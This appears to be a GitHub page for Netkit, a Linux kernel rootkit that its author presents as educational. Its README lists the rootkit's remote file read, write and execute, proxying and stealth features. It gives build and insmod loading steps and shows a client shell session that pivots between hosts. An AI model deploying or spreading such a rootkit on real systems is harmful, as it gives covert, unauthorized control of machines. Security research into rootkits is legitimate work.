Skip to content

Notselwyn/netkit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

96 Commits
client
client
 
 
src
src
 
 
.gitignore
.gitignore
 
 
.gitlab-ci.yml
.gitlab-ci.yml
 
 
.vscode-ctags
.vscode-ctags
 
 
CONTRIBUTING.md
CONTRIBUTING.md
 
 
LICENSE
LICENSE
 
 
Makefile
Makefile
 
 
README.md
README.md
 
 

Repository files navigation

Netkit

Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.

Overview

Netkit has several features:

  • File read
  • File write
  • File execute (stderr + stdout)
  • Proxy
  • Self deletion (stopping the module from running and free'ing resources)

Usage

Once the rootkit is loaded into the system, a user may want to interact with it using the provided psuedo-shell:

cd netkit
$ python3 client/shell.py 10.10.10.1:8008
10.10.10.1:8008/ $ hosts     
usage:
- hosts push <ip>:<port>
- hosts pop

10.10.10.1:8008/ $ hostname
gateway-1a723f

10.10.10.1:8008/ $ hosts push 10.10.10.2:8008
[+] successfully added device 10.10.10.2:8008 to hosts list
10.10.10.1:8008->10.10.10.2:8008/ $ hostname
mail-server

Compilation

To run the rootkit, optionally tweak it in the configurations, build it using make and ship it using insmod, or any other kernel module loader.

==== Please make sure to adjust CONFIG_NETKIT_DEBUG to your liking ====

If CONFIG_NETKIT_DEBUG is enabled, then stealth mode is enabled and the rootkit can only be stopped using the self destruct / exit cmd (not using rmmod).

Make sure to set $KERNEL_DIR to your kernels' hedaer files, like KERNEL_DIR=/usr/src/linux-headers-$(uname -r)

git clone https://github.com/notselwyn/netkit/
cd netkit
make KERNEL_DIR=$KERNEL_DIR

ls -la netkit.ko

Running it with notselwyn/kernel-scripts

Since the rootkit was developed with the author's kernel-scripts, it's a breeze to debug and test. Simply download the scripts and compile a compatible Linux kernel.

To run the kernel:

cd netkit
create-image.sh
run.sh $KERNEL_DIR

To run and interact with the rootkit (make sure it's in debug mode to allow for rmmod in run_kmod.sh):

cd netkit
run_kmod.sh netkit.ko netkit
run_python.sh client/shell.py

Disclaimer

The programs and scripts ("programs") in this software directory/folder/repository ("repository") are published, developed and distributed for educational/research purposes only. I ("the creator") do not condone any malicious or illegal usage of the programs in this repository, as the intend is sharing research and not doing illegal activities with it. I am not legally responsible for anything you do with the programs in this repository.

About

Linux rootkit for educational purposes

Resources

Readme

License

MIT license

Contributing

Contributing
Activity

Stars

33 stars

Watchers

1 watching

Forks

8 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages